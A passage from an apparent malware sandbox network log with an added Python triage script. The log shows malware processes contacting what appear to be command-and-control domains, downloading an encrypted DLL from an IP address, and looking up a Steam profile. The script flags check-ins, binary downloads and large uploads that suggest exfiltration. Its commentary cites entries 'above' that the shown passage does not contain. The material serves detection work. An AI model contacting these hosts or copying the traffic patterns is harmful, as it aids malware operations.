                        Content-Type: text/html
                      • flag-us
                        POST
                        https://crosshuaht.lat/api
                        dee2c68b58.exe
                        Remote address:
                        104.21.52.127:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: crosshuaht.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:47:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=eetneoma5ep37k8nis8s65omv4; expires=Mon, 14 Apr 2025 22:34:30 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHoEPeJ1Sp0fT8j8dLn9l%2B0388cEGTmAEQqkCejx0w3N014mFtQ8Hapgzt8AJQq75sGAxof0TVQg3rsfFc3FfXBuM1%2B1oSzmwO2TuMofMcjGigP%2BNeThRFuTpZ%2F2FZbVuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff2c2f9d7303-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=75174&min_rtt=70072&rtt_var=28889&sent=7&recv=6&lost=0&retrans=1&sent_bytes=2910&recv_bytes=582&delivery_rate=42159&cwnd=249&unsent_bytes=0&cid=0d86328ee927745f&ts=653&x=0"
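The HTTP entries above fall into three patterns worth turning into detections: dee2c68b58.exe sends the same 8-byte application/x-www-form-urlencoded POST to /api at one .lat domain after another (each answered by a Cloudflare front end, per the Server header), skotes.exe fetches several random.exe binaries as application/octet-stream from the IP-literal host 185.215.113.16, and 16d019449f.exe uploads a 407045-byte JSON body to home.twentytk20pn.top and receives a 504. The script below is an added example, not part of this sandbox report and not the sandbox vendor's tooling: it parses entries in the bullet layout used on this page and applies those three heuristics. The rule names, the SMALL_BODY and EXFIL_BYTES thresholds and the HttpEvent field names are this example's own assumptions; the embedded SAMPLE_LOG is constructed by copying three entries from above with most headers removed.

```python
"""Rule-based triage of a sandbox HTTP log in the bullet layout used on this page.
Added example, not the sandbox vendor's code; rule names and thresholds are assumptions."""
import re
from collections import namedtuple

SMALL_BODY = 16        # assumed: the check-in bodies above are 8 bytes
EXFIL_BYTES = 100_000  # assumed: modelled on the 407045-byte JSON POST above
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HttpEvent = namedtuple("HttpEvent", "process method path remote req resp")
# Constructed input: three entries copied from the report above, headers trimmed.
SAMPLE_LOG = """\
• flag-us
POST
https://discokeyus.lat/api
dee2c68b58.exe
Remote address:
172.67.197.170:443
Request
POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Host: discokeyus.lat
Response
HTTP/1.1 200 OK
• flag-ru
GET
http://185.215.113.16/luma/random.exe
skotes.exe
Remote address:
185.215.113.16:80
Request
GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16
Response
HTTP/1.1 200 OK
Content-Type: application/octet-stream
• flag-ru
POST
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
16d019449f.exe
Remote address:
147.45.113.159:80
Request
POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Content-Type: application/json
Content-Length: 407045
Response
HTTP/1.0 504 Gateway Time-out
"""

def _headers(lines):
    pairs = (line.partition(":") for line in lines)
    return {name.strip().lower(): value.strip() for name, sep, value in pairs if sep}

def parse_log(text):
    """Split the bullet list into HttpEvent tuples; DNS entries are skipped."""
    events = []
    for chunk in re.split(r"^\s*\u2022 flag-\w+\s*$", text, flags=re.M):
        lines = [ln.strip() for ln in chunk.splitlines() if ln.strip()]
        if len(lines) < 8 or lines[0] == "DNS":
            continue
        req_i, resp_i = lines.index("Request"), lines.index("Response")
        method, target, _ = lines[req_i + 1].split(" ", 2)
        events.append(HttpEvent(lines[2], method, target.partition("?")[0],
                                lines[lines.index("Remote address:") + 1],
                                _headers(lines[req_i + 2:resp_i]), _headers(lines[resp_i + 1:])))
    return events

def detect(ev):
    """Return the rule names an event matches (heuristics, not signatures)."""
    hits, host_is_ip = [], bool(IP_LITERAL.match(ev.req.get("host", "")))
    body = int(ev.req.get("content-length", "0") or 0)
    req_ct, resp_ct = ev.req.get("content-type", "").lower(), ev.resp.get("content-type", "").lower()
    # Tiny form-encoded POST to /api on a domain: dee2c68b58.exe above, one .lat host after another.
    if (ev.method == "POST" and ev.path == "/api" and not host_is_ip
            and req_ct.startswith("application/x-www-form-urlencoded") and body <= SMALL_BODY):
        hits.append("small-form-post-to-api")
    # Executable fetched from an IP-literal host, as skotes.exe does above.
    if ev.method == "GET" and host_is_ip and (
            resp_ct.startswith("application/octet-stream") or ev.path.lower().endswith(".exe")):
        hits.append("binary-download-from-ip-literal")
    # Hundreds of KB uploaded in one POST by a dropped binary (16d019449f.exe above).
    if ev.method == "POST" and body >= EXFIL_BYTES:
        hits.append("large-upload")
    return hits

def triage(text):
    """Map process name -> list of (host, remote address, rule) for every hit."""
    report = {}
    for ev in parse_log(text):
        for rule in detect(ev):
            report.setdefault(ev.process, []).append((ev.req.get("host", ""), ev.remote, rule))
    return report

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

The IP-literal test keys on the Host header rather than the remote address: the .lat check-ins above terminate at Cloudflare, so the remote address there says nothing about the operator's own servers, while the 185.215.113.x downloads carry the operator's IP in Host and remote address alike. Feed the whole network section of a report in this layout to triage() to get every hit grouped by process; DNS entries and the Firefox background traffic below produce no hits.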
                      • flag-us
                        DNS
                        youtube.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        youtube.com
                        IN A
                        Response
                        youtube.com
                        IN A
                        172.217.18.206
                      • flag-us
                        DNS
                        spocs.getpocket.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        spocs.getpocket.com
                        IN A
                        Response
                        spocs.getpocket.com
                        IN CNAME
                        prod.ads.prod.webservices.mozgcp.net
                        prod.ads.prod.webservices.mozgcp.net
                        IN A
                        34.117.188.166
                      • flag-us
                        DNS
                        spocs.getpocket.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        spocs.getpocket.com
                        IN A
                      • flag-us
                        DNS
                        getpocket.cdn.mozilla.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        getpocket.cdn.mozilla.net
                        IN A
                        Response
                        getpocket.cdn.mozilla.net
                        IN CNAME
                        getpocket-cdn.prod.mozaws.net
                        getpocket-cdn.prod.mozaws.net
                        IN CNAME
                        prod.pocket.prod.cloudops.mozgcp.net
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN A
                        34.120.5.221
                      • flag-us
                        DNS
                        getpocket.cdn.mozilla.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        getpocket.cdn.mozilla.net
                        IN A
                      • flag-fr
                        GET
                        https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                        firefox.exe
                        Remote address:
                        172.217.18.206:443
                        Request
                        GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                        host: youtube.com
                        user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                        accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        accept-language: en-US,en;q=0.5
                        accept-encoding: gzip, deflate, br
                        upgrade-insecure-requests: 1
                        sec-fetch-dest: document
                        sec-fetch-mode: navigate
                        sec-fetch-site: none
                        sec-fetch-user: ?1
                        te: trailers
                      • flag-us
                        DNS
                        youtube.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        youtube.com
                        IN A
                        Response
                        youtube.com
                        IN A
                        172.217.18.206
                      • flag-us
                        DNS
                        youtube.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        youtube.com
                        IN AAAA
                        Response
                        youtube.com
                        IN AAAA
                        2a00:1450:4007:805::200e
                      • flag-us
                        DNS
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN A
                        Response
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN A
                        34.160.144.191
                      • flag-us
                        DNS
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN A
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN A
                        Response
                        shavar.prod.mozaws.net
                        IN A
                        44.228.225.150
                        shavar.prod.mozaws.net
                        IN A
                        52.40.120.141
                        shavar.prod.mozaws.net
                        IN A
                        44.240.87.158
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN A
                      • flag-us
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN A
                      • flag-us
                        GET
                        https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                        firefox.exe
                        Remote address:
                        34.120.5.221:443
                        Request
                        GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                        host: getpocket.cdn.mozilla.net
                        user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                        accept: */*
                        accept-language: en-US,en;q=0.5
                        accept-encoding: gzip, deflate, br
                        sec-fetch-dest: empty
                        sec-fetch-mode: cors
                        sec-fetch-site: cross-site
                        if-none-match: W/"5388-3ipAD46x0Z0uBmgjCYAJqyMEE1A"
                        te: trailers
                      • flag-us
                        DNS
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        IN AAAA
                        2600:1901:0:92a9::
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        Response
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        34.149.100.209
                      • flag-us
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                      • flag-us
                        DNS
                        firefox-settings-attachments.cdn.mozilla.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        firefox-settings-attachments.cdn.mozilla.net
                        IN A
                        Response
                        firefox-settings-attachments.cdn.mozilla.net
                        IN CNAME
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        34.117.121.53
                      • flag-us
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                        Response
                        steamcommunity.com
                        IN A
                        23.214.143.155
                      • Country: US
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                      • Country: US
                        DNS
                        steamcommunity.com
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        steamcommunity.com
                        IN A
                      • Country: US
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN AAAA
                        Response
                      • Country: US
                        DNS
                        shavar.prod.mozaws.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        shavar.prod.mozaws.net
                        IN AAAA
                      • Country: US
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                      • Country: US
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                      • Country: US
                        DNS
                        prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                      • Country: US
                        DNS
                        prod.ads.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.ads.prod.webservices.mozgcp.net
                        IN A
                        Response
                        prod.ads.prod.webservices.mozgcp.net
                        IN A
                        34.117.188.166
                      • Country: US
                        DNS
                        prod.ads.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.ads.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                      • Country: US
                        DNS
                        prod.pocket.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN A
                        Response
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN A
                        34.120.5.221
                      • Country: US
                        DNS
                        prod.pocket.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN AAAA
                        Response
                        prod.pocket.prod.cloudops.mozgcp.net
                        IN AAAA
                        2600:1901:0:524c::
                      • Country: US
                        DNS
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        Response
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN A
                        34.117.121.53
                      • Country: US
                        DNS
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        attachments.prod.remote-settings.prod.webservices.mozgcp.net
                        IN AAAA
                        Response
                      • Country: GB
                        GET
                        https://steamcommunity.com/profiles/76561199724331900
                        dee2c68b58.exe
                        Remote address:
                        23.214.143.155:443
                        Request
                        GET /profiles/76561199724331900 HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Host: steamcommunity.com
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx
                        Content-Type: text/html; charset=UTF-8
                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                        Cache-Control: no-cache
                        Date: Fri, 20 Dec 2024 04:48:05 GMT
                        Content-Length: 35588
                        Connection: keep-alive
                        Set-Cookie: sessionid=303bf56227e0b3b78fc80a82; Path=/; Secure; SameSite=None
                        Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                      • Country: US
                        POST
                        https://lev-tolstoi.com/api
                        dee2c68b58.exe
                        Remote address:
                        172.67.157.254:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: lev-tolstoi.com
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=hospcr9mmcv7t58oea5ldmfvo8; expires=Mon, 14 Apr 2025 22:34:45 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kz7RC6KMNsNfX0wpcvUxrNEUSTdVVDC0qAOzq9SkXsn%2Fn%2Fd5yuC50Jf%2FwPhFTY9ZvtNAKn%2FkKDa8cazrpjas%2BWUafSB0psIHPfRBBIl6kjmf7oZPmyMlyHYHFHwiESZ2yKE%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cff873f7a7701-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=53953&min_rtt=47301&rtt_var=16342&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=583&delivery_rate=70427&cwnd=253&unsent_bytes=0&cid=1007838723e76cfd&ts=241&x=0"
                      • Country: NL
                        GET
                        http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: 1
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/dll/key
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /dll/key HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: 1
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 21
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/dll/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /dll/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: 1
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:12 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                        Content-Length: 97296
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: application/octet-stream
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:13 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:16 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=96
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                      • Country: US
                        DNS
                        prod.balrog.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN A
                        Response
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN A
                        35.244.181.201
                      • Country: US
                        DNS
                        prod.balrog.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN AAAA
                        Response
                      • Country: US
                        DNS
                        prod.balrog.prod.cloudops.mozgcp.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        prod.balrog.prod.cloudops.mozgcp.net
                        IN AAAA
                      • Country: US
                        DNS
                        ciscobinary.openh264.org
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ciscobinary.openh264.org
                        IN A
                        Response
                        ciscobinary.openh264.org
                        IN CNAME
                        a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                        a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                        IN CNAME
                        a17.rackcdn.com
                        a17.rackcdn.com
                        IN CNAME
                        a17.rackcdn.com.mdc.edgesuite.net
                        a17.rackcdn.com.mdc.edgesuite.net
                        IN CNAME
                        a19.dscg10.akamai.net
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.155
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.209
                      • Country: US
                        DNS
                        ciscobinary.openh264.org
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ciscobinary.openh264.org
                        IN A
                      • Country: GB
                        GET
                        http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                        firefox.exe
                        Remote address:
                        88.221.134.155:80
                        Request
                        GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                        Host: ciscobinary.openh264.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                        Accept: */*
                        Accept-Language: en-US,en;q=0.5
                        Accept-Encoding: gzip, deflate
                        Connection: keep-alive
                        Response
                        HTTP/1.1 200 OK
                        Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                        ETag: 85430baed3398695717b0263807cf97c
                        Content-Length: 453023
                        Accept-Ranges: bytes
                        X-Timestamp: 1731034347.00215
                        Content-Type: application/zip
                        X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                        Cache-Control: public, max-age=97643
                        Expires: Sat, 21 Dec 2024 07:55:41 GMT
                        Date: Fri, 20 Dec 2024 04:48:18 GMT
                        Connection: keep-alive
                      • Country: US
                        DNS
                        a19.dscg10.akamai.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        a19.dscg10.akamai.net
                        IN A
                        Response
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.209
                        a19.dscg10.akamai.net
                        IN A
                        88.221.134.155
                      • Country: US
                        DNS
                        a19.dscg10.akamai.net
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        a19.dscg10.akamai.net
                        IN AAAA
                        Response
                        a19.dscg10.akamai.net
                        IN AAAA
                        2a02:26f0:a1::58dd:869b
                        a19.dscg10.akamai.net
                        IN AAAA
                        2a02:26f0:a1::58dd:86d1
                      • Country: US
                        DNS
                        redirector.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        redirector.gvt1.com
                        IN A
                        Response
                        redirector.gvt1.com
                        IN A
                        172.217.20.174
                      • Country: US
                        DNS
                        redirector.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        redirector.gvt1.com
                        IN A
                        Response
                        redirector.gvt1.com
                        IN A
                        172.217.20.174
                      • Country: US
                        DNS
                        redirector.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        redirector.gvt1.com
                        IN AAAA
                        Response
                        redirector.gvt1.com
                        IN AAAA
                        2a00:1450:4007:80c::200e
                      • Country: US
                        DNS
                        r4---sn-aigzrnsz.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        r4---sn-aigzrnsz.gvt1.com
                        IN A
                        Response
                        r4---sn-aigzrnsz.gvt1.com
                        IN CNAME
                        r4.sn-aigzrnsz.gvt1.com
                        r4.sn-aigzrnsz.gvt1.com
                        IN A
                        74.125.175.169
                      • Country: US
                        DNS
                        r4.sn-aigzrnsz.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        r4.sn-aigzrnsz.gvt1.com
                        IN A
                        Response
                        r4.sn-aigzrnsz.gvt1.com
                        IN A
                        74.125.175.169
                      • Country: US
                        DNS
                        r4.sn-aigzrnsz.gvt1.com
                        firefox.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        r4.sn-aigzrnsz.gvt1.com
                        IN AAAA
                        Response
